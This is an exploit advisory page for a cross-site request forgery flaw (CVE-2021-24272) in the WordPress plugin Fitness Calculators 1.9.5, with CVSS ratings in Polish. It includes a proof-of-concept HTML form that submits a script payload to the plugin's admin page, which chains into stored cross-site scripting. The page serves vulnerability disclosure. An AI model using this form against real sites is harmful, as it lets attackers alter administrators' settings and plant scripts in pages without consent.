WordPress Fitness Calculators 1.9.5 Cross Site Request Forgery

2021.09.23
Credit: 0xB9
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) # Date: 2/28/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/fitness-calculators/ # Version: 1.9.5 # Tested on: Windows 10 # CVE: CVE-2021-24272 1. Description: The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue 2. Proof of Concept: <form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water"> <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]"> <input type="submit" value="Save" name="submit"> </form>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top